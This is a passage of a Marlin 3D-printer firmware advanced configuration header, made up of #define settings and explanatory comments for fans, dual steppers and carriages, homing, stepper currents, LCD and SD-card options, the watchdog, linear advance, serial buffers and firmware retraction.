// The final temperature is calculated as (measuredTemp * GAIN) + OFFSET. #define TEMP_SENSOR_AD595_OFFSET 0.0 #define TEMP_SENSOR_AD595_GAIN 1.0 #define TEMP_SENSOR_AD8495_OFFSET 0.0 #define TEMP_SENSOR_AD8495_GAIN 1.0 /** * Controller Fan * To cool down the stepper drivers and MOSFETs. * * The fan will turn on automatically whenever any stepper is enabled * and turn off after a set period after all steppers are turned off. */ //#define USE_CONTROLLER_FAN #if ENABLED(USE_CONTROLLER_FAN) //#define CONTROLLER_FAN_PIN -1 // Set a custom pin for the controller fan #define CONTROLLERFAN_SECS 60 // Duration in seconds for the fan to run after all motors are disabled #define CONTROLLERFAN_SPEED 255 // 255 == full speed #endif // When first starting the main fan, run it at full speed for the // given number of milliseconds. This gets the fan spinning reliably // before setting a PWM value. (Does not work with software PWM for fan on Sanguinololu) //#define FAN_KICKSTART_TIME 100 /** * PWM Fan Scaling * * Define the min/max speeds for PWM fans (as set with M106). * * With these options the M106 0-255 value range is scaled to a subset * to ensure that the fan has enough power to spin, or to run lower * current fans with higher current. (e.g., 5V/12V fans with 12V/24V) * Value 0 always turns off the fan. * * Define one or both of these to override the default 0-255 range. */ //#define FAN_MIN_PWM 50 //#define FAN_MAX_PWM 128 // @section extruder /** * Extruder cooling fans * * Extruder auto fans automatically turn on when their extruders' * temperatures go above EXTRUDER_AUTO_FAN_TEMPERATURE. * * Your board's pins file specifies the recommended pins. Override those here * or set to -1 to disable completely. * * Multiple extruders can be assigned to the same pin in which case * the fan will turn on when any selected extruder is above the threshold. */ #define E0_AUTO_FAN_PIN -1 #define E1_AUTO_FAN_PIN -1 #define E2_AUTO_FAN_PIN -1 #define E3_AUTO_FAN_PIN -1 #define E4_AUTO_FAN_PIN -1 #define CHAMBER_AUTO_FAN_PIN -1 #define EXTRUDER_AUTO_FAN_TEMPERATURE 50 #define EXTRUDER_AUTO_FAN_SPEED 255 // == full speed /** * Part-Cooling Fan Multiplexer * * This feature allows you to digitally multiplex the fan output. * The multiplexer is automatically switched at tool-change. * Set FANMUX[012]_PINs below for up to 2, 4, or 8 multiplexed fans. */ #define FANMUX0_PIN -1 #define FANMUX1_PIN -1 #define FANMUX2_PIN -1 /** * M355 Case Light on-off / brightness */ //#define CASE_LIGHT_ENABLE #if ENABLED(CASE_LIGHT_ENABLE) //#define CASE_LIGHT_PIN 4 // Override the default pin if needed #define INVERT_CASE_LIGHT false // Set true if Case Light is ON when pin is LOW #define CASE_LIGHT_DEFAULT_ON true // Set default power-up state on #define CASE_LIGHT_DEFAULT_BRIGHTNESS 105 // Set default power-up brightness (0-255, requires PWM pin) //#define MENU_ITEM_CASE_LIGHT // Add a Case Light option to the LCD main menu //#define CASE_LIGHT_USE_NEOPIXEL // Use Neopixel LED as case light, requires NEOPIXEL_LED. #if ENABLED(CASE_LIGHT_USE_NEOPIXEL) #define CASE_LIGHT_NEOPIXEL_COLOR { 255, 255, 255, 255 } // { Red, Green, Blue, White } #endif #endif //=========================================================================== //============================ Mechanical Settings ========================== //=========================================================================== // @section homing // If you want endstops to stay on (by default) even when not homing // enable this option. Override at any time with M120, M121. 
//#define ENDSTOPS_ALWAYS_ON_DEFAULT // @section extras //#define Z_LATE_ENABLE // Enable Z the last moment. Needed if your Z driver overheats. /** * Dual Steppers / Dual Endstops * * This section will allow you to use extra E drivers to drive a second motor for X, Y, or Z axes. * * For example, set X_DUAL_STEPPER_DRIVERS setting to use a second motor. If the motors need to * spin in opposite directions set INVERT_X2_VS_X_DIR. If the second motor needs its own endstop * set X_DUAL_ENDSTOPS. This can adjust for "racking." Use X2_USE_ENDSTOP to set the endstop plug * that should be used for the second endstop. Extra endstops will appear in the output of 'M119'. * * Use X_DUAL_ENDSTOP_ADJUSTMENT to adjust for mechanical imperfection. After homing both motors * this offset is applied to the X2 motor. To find the offset home the X axis, and measure the error * in X2. Dual endstop offsets can be set at runtime with 'M666 X<offset> Y<offset> Z<offset>'. */ //#define X_DUAL_STEPPER_DRIVERS #if ENABLED(X_DUAL_STEPPER_DRIVERS) #define INVERT_X2_VS_X_DIR true // Set 'true' if X motors should rotate in opposite directions //#define X_DUAL_ENDSTOPS #if ENABLED(X_DUAL_ENDSTOPS) #define X2_USE_ENDSTOP _XMAX_ #define X_DUAL_ENDSTOPS_ADJUSTMENT 0 #endif #endif //#define Y_DUAL_STEPPER_DRIVERS #if ENABLED(Y_DUAL_STEPPER_DRIVERS) #define INVERT_Y2_VS_Y_DIR true // Set 'true' if Y motors should rotate in opposite directions //#define Y_DUAL_ENDSTOPS #if ENABLED(Y_DUAL_ENDSTOPS) #define Y2_USE_ENDSTOP _YMAX_ #define Y_DUAL_ENDSTOPS_ADJUSTMENT 0 #endif #endif //#define Z_DUAL_STEPPER_DRIVERS #if ENABLED(Z_DUAL_STEPPER_DRIVERS) //#define Z_DUAL_ENDSTOPS #if ENABLED(Z_DUAL_ENDSTOPS) #define Z2_USE_ENDSTOP _XMAX_ #define Z_DUAL_ENDSTOPS_ADJUSTMENT 0 #endif #endif /** * Dual X Carriage * * This setup has two X carriages that can move independently, each with its own hotend. * The carriages can be used to print an object with two colors or materials, or in * "duplication mode" it can print two identical or X-mirrored objects simultaneously. * The inactive carriage is parked automatically to prevent oozing. * X1 is the left carriage, X2 the right. They park and home at opposite ends of the X axis. * By default the X2 stepper is assigned to the first unused E plug on the board. */ //#define DUAL_X_CARRIAGE #if ENABLED(DUAL_X_CARRIAGE) #define X1_MIN_POS X_MIN_POS // set minimum to ensure first x-carriage doesn't hit the parked second X-carriage #define X1_MAX_POS X_BED_SIZE // set maximum to ensure first x-carriage doesn't hit the parked second X-carriage #define X2_MIN_POS 80 // set minimum to ensure second x-carriage doesn't hit the parked first X-carriage #define X2_MAX_POS 353 // set maximum to the distance between toolheads when both heads are homed #define X2_HOME_DIR 1 // the second X-carriage always homes to the maximum endstop position #define X2_HOME_POS X2_MAX_POS // default home position is the maximum carriage position // However: In this mode the HOTEND_OFFSET_X value for the second extruder provides a software // override for X2_HOME_POS. This also allow recalibration of the distance between the two endstops // without modifying the firmware (through the "M218 T1 X???" command). // Remember: you should set the second extruder x-offset to 0 in your slicer. // There are a few selectable movement modes for dual x-carriages using M605 S<mode> // Mode 0 (DXC_FULL_CONTROL_MODE): Full control. 
The slicer has full control over both x-carriages and can achieve optimal travel results // as long as it supports dual x-carriages. (M605 S0) // Mode 1 (DXC_AUTO_PARK_MODE) : Auto-park mode. The firmware will automatically park and unpark the x-carriages on tool changes so // that additional slicer support is not required. (M605 S1) // Mode 2 (DXC_DUPLICATION_MODE) : Duplication mode. The firmware will transparently make the second x-carriage and extruder copy all // actions of the first x-carriage. This allows the printer to print 2 arbitrary items at // once. (2nd extruder x offset and temp offset are set using: M605 S2 [Xnnn] [Rmmm]) // This is the default power-up mode which can be later using M605. #define DEFAULT_DUAL_X_CARRIAGE_MODE DXC_FULL_CONTROL_MODE // Default settings in "Auto-park Mode" #define TOOLCHANGE_PARK_ZLIFT 0.2 // the distance to raise Z axis when parking an extruder #define TOOLCHANGE_UNPARK_ZLIFT 1 // the distance to raise Z axis when unparking an extruder // Default x offset in duplication mode (typically set to half print bed width) #define DEFAULT_DUPLICATION_X_OFFSET 100 #endif // DUAL_X_CARRIAGE // Activate a solenoid on the active extruder with M380. Disable all with M381. // Define SOL0_PIN, SOL1_PIN, etc., for each extruder that has a solenoid. //#define EXT_SOLENOID // @section homing // Homing hits each endstop, retracts by these distances, then does a slower bump. #define X_HOME_BUMP_MM 5 #define Y_HOME_BUMP_MM 5 #define Z_HOME_BUMP_MM 5 // deltas need the same for all three axes #define HOMING_BUMP_DIVISOR { 10, 10, 10 } // Re-Bump Speed Divisor (Divides the Homing Feedrate) //#define QUICK_HOME // If homing includes X and Y, do a diagonal move initially // When G28 is called, this option will make Y home before X //#define HOME_Y_BEFORE_X // Enable this if X or Y can't home without homing the other axis first. //#define CODEPENDENT_XY_HOMING // @section machine #define AXIS_RELATIVE_MODES {false, false, false, false} // Allow duplication mode with a basic dual-nozzle extruder //#define DUAL_NOZZLE_DUPLICATION_MODE // By default pololu step drivers require an active high signal. However, some high power drivers require an active low signal as step. #define INVERT_X_STEP_PIN false #define INVERT_Y_STEP_PIN false #define INVERT_Z_STEP_PIN false #define INVERT_E_STEP_PIN false // Default stepper release if idle. Set to 0 to deactivate. // Steppers will shut down DEFAULT_STEPPER_DEACTIVE_TIME seconds after the last move when DISABLE_INACTIVE_? is true. // Time can be set by M18 and M84. #define DEFAULT_STEPPER_DEACTIVE_TIME 60 #define DISABLE_INACTIVE_X true #define DISABLE_INACTIVE_Y true #define DISABLE_INACTIVE_Z true // set to false if the nozzle will fall down on your printed part when print has finished. #define DISABLE_INACTIVE_E true #define DEFAULT_MINIMUMFEEDRATE 0.0 // minimum feedrate #define DEFAULT_MINTRAVELFEEDRATE 0.0 //#define HOME_AFTER_DEACTIVATE // Require rehoming after steppers are deactivated // @section lcd #if ENABLED(ULTIPANEL) #define MANUAL_FEEDRATE_XYZ 50*60 #define MANUAL_FEEDRATE { MANUAL_FEEDRATE_XYZ, MANUAL_FEEDRATE_XYZ, MANUAL_FEEDRATE_XYZ, 60 } // Feedrates for manual moves along X, Y, Z, E from panel #define ULTIPANEL_FEEDMULTIPLY // Comment to disable setting feedrate multiplier via encoder #endif // @section extras // minimum time in microseconds that a movement needs to take if the buffer is emptied. 
#define DEFAULT_MINSEGMENTTIME 20000 // If defined the movements slow down when the look ahead buffer is only half full // (don't use SLOWDOWN with DELTA because DELTA generates hundreds of segments per second) //#define SLOWDOWN // Frequency limit // See nophead's blog for more info // Not working O //#define XY_FREQUENCY_LIMIT 15 // Minimum planner junction speed. Sets the default minimum speed the planner plans for at the end // of the buffer and all stops. This should not be much greater than zero and should only be changed // if unwanted behavior is observed on a user's machine when running at very slow speeds. #define MINIMUM_PLANNER_SPEED 0.05 // (mm/sec) // // Use Junction Deviation instead of traditional Jerk Limiting // //#define JUNCTION_DEVIATION #if ENABLED(JUNCTION_DEVIATION) #define JUNCTION_DEVIATION_MM 0.02 // (mm) Distance from real junction edge #endif /** * Adaptive Step Smoothing increases the resolution of multi-axis moves, particularly at step frequencies * below 1kHz (for AVR) or 10kHz (for ARM), where aliasing between axes in multi-axis moves causes audible * vibration and surface artifacts. The algorithm adapts to provide the best possible step smoothing at the * lowest stepping frequencies. */ //#define ADAPTIVE_STEP_SMOOTHING // Microstep setting (Only functional when stepper driver microstep pins are connected to MCU. #define MICROSTEP_MODES { 16, 16, 16, 16, 16 } // [1,2,4,8,16] /** * @section stepper motor current * * Some boards have a means of setting the stepper motor current via firmware. * * The power on motor currents are set by: * PWM_MOTOR_CURRENT - used by MINIRAMBO & ULTIMAIN_2 * known compatible chips: A4982 * DIGIPOT_MOTOR_CURRENT - used by BQ_ZUM_MEGA_3D, RAMBO & SCOOVO_X9H * known compatible chips: AD5206 * DAC_MOTOR_CURRENT_DEFAULT - used by PRINTRBOARD_REVF & RIGIDBOARD_V2 * known compatible chips: MCP4728 * DIGIPOT_I2C_MOTOR_CURRENTS - used by 5DPRINT, AZTEEG_X3_PRO, MIGHTYBOARD_REVE * known compatible chips: MCP4451, MCP4018 * * Motor currents can also be set by M907 - M910 and by the LCD. * M907 - applies to all. * M908 - BQ_ZUM_MEGA_3D, RAMBO, PRINTRBOARD_REVF, RIGIDBOARD_V2 & SCOOVO_X9H * M909, M910 & LCD - only PRINTRBOARD_REVF & RIGIDBOARD_V2 */ //#define PWM_MOTOR_CURRENT { 1300, 1300, 1250 } // Values in milliamps //#define DIGIPOT_MOTOR_CURRENT { 135,135,135,135,135 } // Values 0-255 (RAMBO 135 = ~0.75A, 185 = ~1A) //#define DAC_MOTOR_CURRENT_DEFAULT { 70, 80, 90, 80 } // Default drive percent - X, Y, Z, E axis // Use an I2C based DIGIPOT (e.g., Azteeg X3 Pro) //#define DIGIPOT_I2C #if ENABLED(DIGIPOT_I2C) && !defined(DIGIPOT_I2C_ADDRESS_A) /** * Common slave addresses: * * A (A shifted) B (B shifted) IC * Smoothie 0x2C (0x58) 0x2D (0x5A) MCP4451 * AZTEEG_X3_PRO 0x2C (0x58) 0x2E (0x5C) MCP4451 * MIGHTYBOARD_REVE 0x2F (0x5E) MCP4018 */ #define DIGIPOT_I2C_ADDRESS_A 0x2C // unshifted slave address for first DIGIPOT #define DIGIPOT_I2C_ADDRESS_B 0x2D // unshifted slave address for second DIGIPOT #endif //#define DIGIPOT_MCP4018 // Requires library from https://github.com/stawel/SlowSoftI2CMaster #define DIGIPOT_I2C_NUM_CHANNELS 8 // 5DPRINT: 4 AZTEEG_X3_PRO: 8 // Actual motor currents in Amps. The number of entries must match DIGIPOT_I2C_NUM_CHANNELS. // These correspond to the physical drivers, so be mindful if the order is changed. 
#define DIGIPOT_I2C_MOTOR_CURRENTS { 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0 } // AZTEEG_X3_PRO //=========================================================================== //=============================Additional Features=========================== //=========================================================================== #define ENCODER_RATE_MULTIPLIER // If defined, certain menu edit operations automatically multiply the steps when the encoder is moved quickly #define ENCODER_10X_STEPS_PER_SEC 75 // If the encoder steps per sec exceeds this value, multiply steps moved x10 to quickly advance the value #define ENCODER_100X_STEPS_PER_SEC 160 // If the encoder steps per sec exceeds this value, multiply steps moved x100 to really quickly advance the value //#define CHDK 4 //Pin for triggering CHDK to take a picture see how to use it here http://captain-slow.dk/2014/03/09/3d-printing-timelapses/ #define CHDK_DELAY 50 //How long in ms the pin should stay HIGH before going LOW again // @section lcd // Include a page of printer information in the LCD Main Menu //#define LCD_INFO_MENU // Scroll a longer status message into view //#define STATUS_MESSAGE_SCROLLING // On the Info Screen, display XY with one decimal place when possible //#define LCD_DECIMAL_SMALL_XY // The timeout (in ms) to return to the status screen from sub-menus //#define LCD_TIMEOUT_TO_STATUS 15000 // Add an 'M73' G-code to set the current percentage //#define LCD_SET_PROGRESS_MANUALLY #if ENABLED(SDSUPPORT) || ENABLED(LCD_SET_PROGRESS_MANUALLY) //#define LCD_PROGRESS_BAR // Show a progress bar on HD44780 LCDs for SD printing #if ENABLED(LCD_PROGRESS_BAR) #define PROGRESS_BAR_BAR_TIME 2000 // (ms) Amount of time to show the bar #define PROGRESS_BAR_MSG_TIME 3000 // (ms) Amount of time to show the status message #define PROGRESS_MSG_EXPIRE 0 // (ms) Amount of time to retain the status message (0=forever) //#define PROGRESS_MSG_ONCE // Show the message for MSG_TIME then clear it //#define LCD_PROGRESS_BAR_TEST // Add a menu item to test the progress bar #endif #endif // SDSUPPORT || LCD_SET_PROGRESS_MANUALLY /** * LED Control Menu * Enable this feature to add LED Control to the LCD menu */ //#define LED_CONTROL_MENU #if ENABLED(LED_CONTROL_MENU) #define LED_COLOR_PRESETS // Enable the Preset Color menu option #if ENABLED(LED_COLOR_PRESETS) #define LED_USER_PRESET_RED 255 // User defined RED value #define LED_USER_PRESET_GREEN 128 // User defined GREEN value #define LED_USER_PRESET_BLUE 0 // User defined BLUE value #define LED_USER_PRESET_WHITE 255 // User defined WHITE value #define LED_USER_PRESET_BRIGHTNESS 255 // User defined intensity //#define LED_USER_PRESET_STARTUP // Have the printer display the user preset color on startup #endif #endif // LED_CONTROL_MENU #if ENABLED(SDSUPPORT) // Some RAMPS and other boards don't detect when an SD card is inserted. You can work // around this by connecting a push button or single throw switch to the pin defined // as SD_DETECT_PIN in your board's pins definitions. // This setting should be disabled unless you are using a push button, pulling the pin to ground. // Note: This is always disabled for ULTIPANEL (except ELB_FULL_GRAPHIC_CONTROLLER). #define SD_DETECT_INVERTED #define SD_FINISHED_STEPPERRELEASE true // Disable steppers when SD Print is finished #define SD_FINISHED_RELEASECOMMAND "M84 X Y Z E" // You might want to keep the z enabled so your bed stays in place. // Reverse SD sort to show "more recent" files first, according to the card's FAT. 
// Since the FAT gets out of order with usage, SDCARD_SORT_ALPHA is recommended. #define SDCARD_RATHERRECENTFIRST // Add an option in the menu to run all auto#.g files //#define MENU_ADDAUTOSTART /** * Continue after Power-Loss (Creality3D) * * Store the current state to the SD Card at the start of each layer * during SD printing. If the recovery file is found at boot time, present * an option on the LCD screen to continue the print from the last-known * point in the file. */ //#define POWER_LOSS_RECOVERY #if ENABLED(POWER_LOSS_RECOVERY) //#define POWER_LOSS_PIN 44 // Pin to detect power loss //#define POWER_LOSS_STATE HIGH // State of pin indicating power loss #endif /** * Sort SD file listings in alphabetical order. * * With this option enabled, items on SD cards will be sorted * by name for easier navigation. * * By default... * * - Use the slowest -but safest- method for sorting. * - Folders are sorted to the top. * - The sort key is statically allocated. * - No added G-code (M34) support. * - 40 item sorting limit. (Items after the first 40 are unsorted.) * * SD sorting uses static allocation (as set by SDSORT_LIMIT), allowing the * compiler to calculate the worst-case usage and throw an error if the SRAM * limit is exceeded. * * - SDSORT_USES_RAM provides faster sorting via a static directory buffer. * - SDSORT_USES_STACK does the same, but uses a local stack-based buffer. * - SDSORT_CACHE_NAMES will retain the sorted file listing in RAM. (Expensive!) * - SDSORT_DYNAMIC_RAM only uses RAM when the SD menu is visible. (Use with caution!) */ //#define SDCARD_SORT_ALPHA // SD Card Sorting options #if ENABLED(SDCARD_SORT_ALPHA) #define SDSORT_LIMIT 40 // Maximum number of sorted items (10-256). Costs 27 bytes each. #define FOLDER_SORTING -1 // -1=above 0=none 1=below #define SDSORT_GCODE false // Allow turning sorting on/off with LCD and M34 g-code. #define SDSORT_USES_RAM false // Pre-allocate a static array for faster pre-sorting. #define SDSORT_USES_STACK false // Prefer the stack for pre-sorting to give back some SRAM. (Negated by next 2 options.) #define SDSORT_CACHE_NAMES false // Keep sorted items in RAM longer for speedy performance. Most expensive option. #define SDSORT_DYNAMIC_RAM false // Use dynamic allocation (within SD menus). Least expensive option. Set SDSORT_LIMIT before use! #define SDSORT_CACHE_VFATS 2 // Maximum number of 13-byte VFAT entries to use for sorting. // Note: Only affects SCROLL_LONG_FILENAMES with SDSORT_CACHE_NAMES but not SDSORT_DYNAMIC_RAM. #endif // This allows hosts to request long names for files and folders with M33 //#define LONG_FILENAME_HOST_SUPPORT // Enable this option to scroll long filenames in the SD card menu //#define SCROLL_LONG_FILENAMES /** * This option allows you to abort SD printing when any endstop is triggered. * This feature must be enabled with "M540 S1" or from the LCD menu. * To have any effect, endstops must be enabled during SD printing. */ //#define ABORT_ON_ENDSTOP_HIT_FEATURE_ENABLED /** * This option makes it easier to print the same SD Card file again. * On print completion the LCD Menu will open with the file selected. * You can just click to start the print, or navigate elsewhere. 
*/ //#define SD_REPRINT_LAST_SELECTED_FILE /** * Auto-report SdCard status with M27 S<seconds> */ //#define AUTO_REPORT_SD_STATUS #endif // SDSUPPORT /** * Additional options for Graphical Displays * * Use the optimizations here to improve printing performance, * which can be adversely affected by graphical display drawing, * especially when doing several short moves, and when printing * on DELTA and SCARA machines. * * Some of these options may result in the display lagging behind * controller events, as there is a trade-off between reliable * printing performance versus fast display updates. */ #if ENABLED(DOGLCD) // Show SD percentage next to the progress bar //#define DOGM_SD_PERCENT // Enable to save many cycles by drawing a hollow frame on the Info Screen #define XYZ_HOLLOW_FRAME // Enable to save many cycles by drawing a hollow frame on Menu Screens #define MENU_HOLLOW_FRAME // A bigger font is available for edit items. Costs 3120 bytes of PROGMEM. // Western only. Not available for Cyrillic, Kana, Turkish, Greek, or Chinese. //#define USE_BIG_EDIT_FONT // A smaller font may be used on the Info Screen. Costs 2300 bytes of PROGMEM. // Western only. Not available for Cyrillic, Kana, Turkish, Greek, or Chinese. //#define USE_SMALL_INFOFONT // Enable this option and reduce the value to optimize screen updates. // The normal delay is 10µs. Use the lowest value that still gives a reliable display. //#define DOGM_SPI_DELAY_US 5 // Swap the CW/CCW indicators in the graphics overlay //#define OVERLAY_GFX_REVERSE #if ENABLED(U8GLIB_ST7920) /** * ST7920-based LCDs can emulate a 16 x 4 character display using * the ST7920 character-generator for very fast screen updates. * Enable LIGHTWEIGHT_UI to use this special display mode. * * Since LIGHTWEIGHT_UI has limited space, the position and status * message occupy the same line. Set STATUS_EXPIRE_SECONDS to the * length of time to display the status message before clearing. * * Set STATUS_EXPIRE_SECONDS to zero to never clear the status. * This will prevent position updates from being displayed. */ //#define LIGHTWEIGHT_UI #if ENABLED(LIGHTWEIGHT_UI) #define STATUS_EXPIRE_SECONDS 20 #endif #endif #endif // DOGLCD // @section safety // The hardware watchdog should reset the microcontroller disabling all outputs, // in case the firmware gets stuck and doesn't do temperature regulation. #define USE_WATCHDOG #if ENABLED(USE_WATCHDOG) // If you have a watchdog reboot in an ArduinoMega2560 then the device will hang forever, as a watchdog reset will leave the watchdog on. // The "WATCHDOG_RESET_MANUAL" goes around this by not using the hardware reset. // However, THIS FEATURE IS UNSAFE!, as it will only work if interrupts are disabled. And the code could hang in an interrupt routine with interrupts disabled. //#define WATCHDOG_RESET_MANUAL #endif // @section lcd /** * Babystepping enables movement of the axes by tiny increments without changing * the current position values. This feature is used primarily to adjust the Z * axis in the first layer of a print in real-time. * * Warning: Does not respect endstops! */ //#define BABYSTEPPING #if ENABLED(BABYSTEPPING) //#define BABYSTEP_XY // Also enable X/Y Babystepping. Not supported on DELTA! #define BABYSTEP_INVERT_Z false // Change if Z babysteps should go the other way #define BABYSTEP_MULTIPLICATOR 1 // Babysteps are very small. Increase for faster motion. 
//#define BABYSTEP_ZPROBE_OFFSET // Enable to combine M851 and Babystepping //#define DOUBLECLICK_FOR_Z_BABYSTEPPING // Double-click on the Status Screen for Z Babystepping. #define DOUBLECLICK_MAX_INTERVAL 1250 // Maximum interval between clicks, in milliseconds. // Note: Extra time may be added to mitigate controller latency. //#define BABYSTEP_ZPROBE_GFX_OVERLAY // Enable graphical overlay on Z-offset editor #endif // @section extruder /** * Linear Pressure Control v1.5 * * Assumption: advance [steps] = k * (delta velocity [steps/s]) * K=0 means advance disabled. * * NOTE: K values for LIN_ADVANCE 1.5 differ from earlier versions! * * Set K around 0.22 for 3mm PLA Direct Drive with ~6.5cm between the drive gear and heatbreak. * Larger K values will be needed for flexible filament and greater distances. * If this algorithm produces a higher speed offset than the extruder can handle (compared to E jerk) * print acceleration will be reduced during the affected moves to keep within the limit. * * See http://marlinfw.org/docs/features/lin_advance.html for full instructions. * Mention @Sebastianv650 on GitHub to alert the author of any issues. */ //#define LIN_ADVANCE #if ENABLED(LIN_ADVANCE) #define LIN_ADVANCE_K 0.22 // Unit: mm compression per 1mm/s extruder speed //#define LA_DEBUG // If enabled, this will generate debug information output over USB. #endif // @section leveling #if ENABLED(MESH_BED_LEVELING) || ENABLED(AUTO_BED_LEVELING_UBL) // Override the mesh area if the automatic (max) area is too large //#define MESH_MIN_X MESH_INSET //#define MESH_MIN_Y MESH_INSET //#define MESH_MAX_X X_BED_SIZE - (MESH_INSET) //#define MESH_MAX_Y Y_BED_SIZE - (MESH_INSET) #endif // @section extras // // G2/G3 Arc Support // #define ARC_SUPPORT // Disable this feature to save ~3226 bytes #if ENABLED(ARC_SUPPORT) #define MM_PER_ARC_SEGMENT 1 // Length of each arc segment #define N_ARC_CORRECTION 25 // Number of intertpolated segments between corrections //#define ARC_P_CIRCLES // Enable the 'P' parameter to specify complete circles //#define CNC_WORKSPACE_PLANES // Allow G2/G3 to operate in XY, ZX, or YZ planes #endif // Support for G5 with XYZE destination and IJPQ offsets. Requires ~2666 bytes. //#define BEZIER_CURVE_SUPPORT // G38.2 and G38.3 Probe Target // Set MULTIPLE_PROBING if you want G38 to double touch //#define G38_PROBE_TARGET #if ENABLED(G38_PROBE_TARGET) #define G38_MINIMUM_MOVE 0.0275 // minimum distance in mm that will produce a move (determined using the print statement in check_move) #endif // Moves (or segments) with fewer steps than this will be joined with the next move #define MIN_STEPS_PER_SEGMENT 6 /** * Minimum delay after setting the stepper DIR (in ns) * 0 : No delay (Expect at least 10µS since one Stepper ISR must transpire) * 20 : Minimum for TMC2xxx drivers * 200 : Minimum for A4988 drivers * 500 : Minimum for LV8729 drivers (guess, no info in datasheet) * 650 : Minimum for DRV8825 drivers * 1500 : Minimum for TB6600 drivers (guess, no info in datasheet) * 15000 : Minimum for TB6560 drivers (guess, no info in datasheet) * * Override the default value based on the driver type set in Configuration.h. 
*/ //#define MINIMUM_STEPPER_DIR_DELAY 650 /** * Minimum stepper driver pulse width (in µs) * 0 : Smallest possible width the MCU can produce, compatible with TMC2xxx drivers * 1 : Minimum for A4988 stepper drivers * 1 : Minimum for LV8729 stepper drivers * 2 : Minimum for DRV8825 stepper drivers * 3 : Minimum for TB6600 stepper drivers * 30 : Minimum for TB6560 stepper drivers * * Override the default value based on the driver type set in Configuration.h. */ //#define MINIMUM_STEPPER_PULSE 2 /** * Maximum stepping rate (in Hz) the stepper driver allows * If undefined, defaults to 1MHz / (2 * MINIMUM_STEPPER_PULSE) * 500000 : Maximum for A4988 stepper driver * 400000 : Maximum for TMC2xxx stepper drivers * 250000 : Maximum for DRV8825 stepper driver * 150000 : Maximum for TB6600 stepper driver * 130000 : Maximum for LV8729 stepper driver * 15000 : Maximum for TB6560 stepper driver * * Override the default value based on the driver type set in Configuration.h. */ //#define MAXIMUM_STEPPER_RATE 250000 // @section temperature // Control heater 0 and heater 1 in parallel. //#define HEATERS_PARALLEL //=========================================================================== //================================= Buffers ================================= //=========================================================================== // @section hidden // The number of linear motions that can be in the plan at any give time. // THE BLOCK_BUFFER_SIZE NEEDS TO BE A POWER OF 2 (e.g. 8, 16, 32) because shifts and ors are used to do the ring-buffering. #if ENABLED(SDSUPPORT) #define BLOCK_BUFFER_SIZE 16 // SD,LCD,Buttons take more memory, block buffer needs to be smaller #else #define BLOCK_BUFFER_SIZE 16 // maximize block buffer #endif // @section serial // The ASCII buffer for serial input #define MAX_CMD_SIZE 96 #define BUFSIZE 4 // Transmission to Host Buffer Size // To save 386 bytes of PROGMEM (and TX_BUFFER_SIZE+3 bytes of RAM) set to 0. // To buffer a simple "ok" you need 4 bytes. // For ADVANCED_OK (M105) you need 32 bytes. // For debug-echo: 128 bytes for the optimal speed. // Other output doesn't need to be that speedy. // :[0, 2, 4, 8, 16, 32, 64, 128, 256] #define TX_BUFFER_SIZE 0 // Host Receive Buffer Size // Without XON/XOFF flow control (see SERIAL_XON_XOFF below) 32 bytes should be enough. // To use flow control, set this buffer size to at least 1024 bytes. // :[0, 2, 4, 8, 16, 32, 64, 128, 256, 512, 1024, 2048] //#define RX_BUFFER_SIZE 1024 #if RX_BUFFER_SIZE >= 1024 // Enable to have the controller send XON/XOFF control characters to // the host to signal the RX buffer is becoming full. //#define SERIAL_XON_XOFF #endif #if ENABLED(SDSUPPORT) // Enable this option to collect and display the maximum // RX queue usage after transferring a file to SD. //#define SERIAL_STATS_MAX_RX_QUEUED // Enable this option to collect and display the number // of dropped bytes after a file transfer to SD. //#define SERIAL_STATS_DROPPED_RX #endif // Enable an emergency-command parser to intercept certain commands as they // enter the serial receive buffer, so they cannot be blocked. // Currently handles M108, M112, M410 // Does not work on boards using AT90USB (USBCON) processors! //#define EMERGENCY_PARSER // Bad Serial-connections can miss a received command by sending an 'ok' // Therefore some clients abort after 30 seconds in a timeout. // Some other clients start sending commands while receiving a 'wait'. // This "wait" is only sent when the buffer is empty. 1 second is a good value here. 
//#define NO_TIMEOUTS 1000 // Milliseconds // Some clients will have this feature soon. This could make the NO_TIMEOUTS unnecessary. //#define ADVANCED_OK // @section extras /** * Firmware-based and LCD-controlled retract * * Add G10 / G11 commands for automatic firmware-based retract / recover. * Use M207 and M208 to define parameters for retract / recover. * * Use M209 to enable or disable auto-retract. * With auto-retract enabled, all G1 E moves within the set range * will be converted to firmware-based retract/recover moves. * * Be sure to turn off auto-retract during filament change. * * Note that M207 / M208 / M209 settings are saved to EEPROM. * */ //#define FWRETRACT // ONLY PARTIALLY TESTED #if ENABLED(FWRETRACT) #define MIN_AUTORETRACT 0.1 // When auto-retract is on, convert E moves of this length and over #define MAX_AUTORETRACT 10.0 // Upper limit for auto-retract conversion #define RETRACT_LENGTH 3 // Default retract length (positive mm) #define RETRACT_LENGTH_SWAP 13 // Default swap retract length (positive mm), for extruder change #define RETRACT_FEEDRATE 45 // Default feedrate for retracting (mm/s) #define RETRACT_ZLIFT 0 // Default retract Z-lift #define RETRACT_RECOVER_LENGTH 0 // Default additional recover length (mm, added to retract length when recovering) #define RETRACT_RECOVER_LENGTH_SWAP 0 // Default additional swap recover length (mm, added to retract length when recovering from extruder change) #define RETRACT_RECOVER_FEEDRATE 8 // Default feedrate for recovering from retraction (mm/s) #define RETRACT_RECOVER_FEEDRATE_SWAP 8 // Default feedrate for recovering from swap retraction (mm/s) #endif /** * Extra Fan Speed * Adds a secondary fan speed for each print-cooling fan. * 'M106 P<fan> T3-255' : Set a secondary speed for <fan> * 'M106 P<fan> T2' : Use the set secondary speed * 'M106 P<fan> T1' : Restore the previous fan speed */ //#define EXTRA_FAN_SPEED /** * Advanced Pause * Experimental feature for filament change support and for parking the nozzle when paused. * Adds the GCode M600 for initiating filament change. * If PARK_HEAD_ON_PAUSE enabled, adds the GCode M125 to pause printing and park the nozzle. * * Requires an LCD display. * Requires NOZZLE_PARK_FEATURE. * This feature is required for the default FILAMENT_RUNOUT_SCRIPT. */ //#define ADVANCED_PAUSE_FEATURE #if ENABLED(ADVANCED_PAUSE_FEATURE) #define PAUSE_PARK_RETRACT_FEEDRATE 60 // (mm/s) Initial retract feedrate. #define PAUSE_PARK_RETRACT_LENGTH 2 // (mm) Initial retract. // This short retract is done immediately, before parking the nozzle. #define FILAMENT_CHANGE_UNLOAD_FEEDRATE 10 // (mm/s) Unload filament feedrate. This can be pretty fast. #define FILAMENT_CHANGE_UNLOAD_ACCEL 25 // (mm/s^2) Lower acceleration may allow a faster feedrate. #define 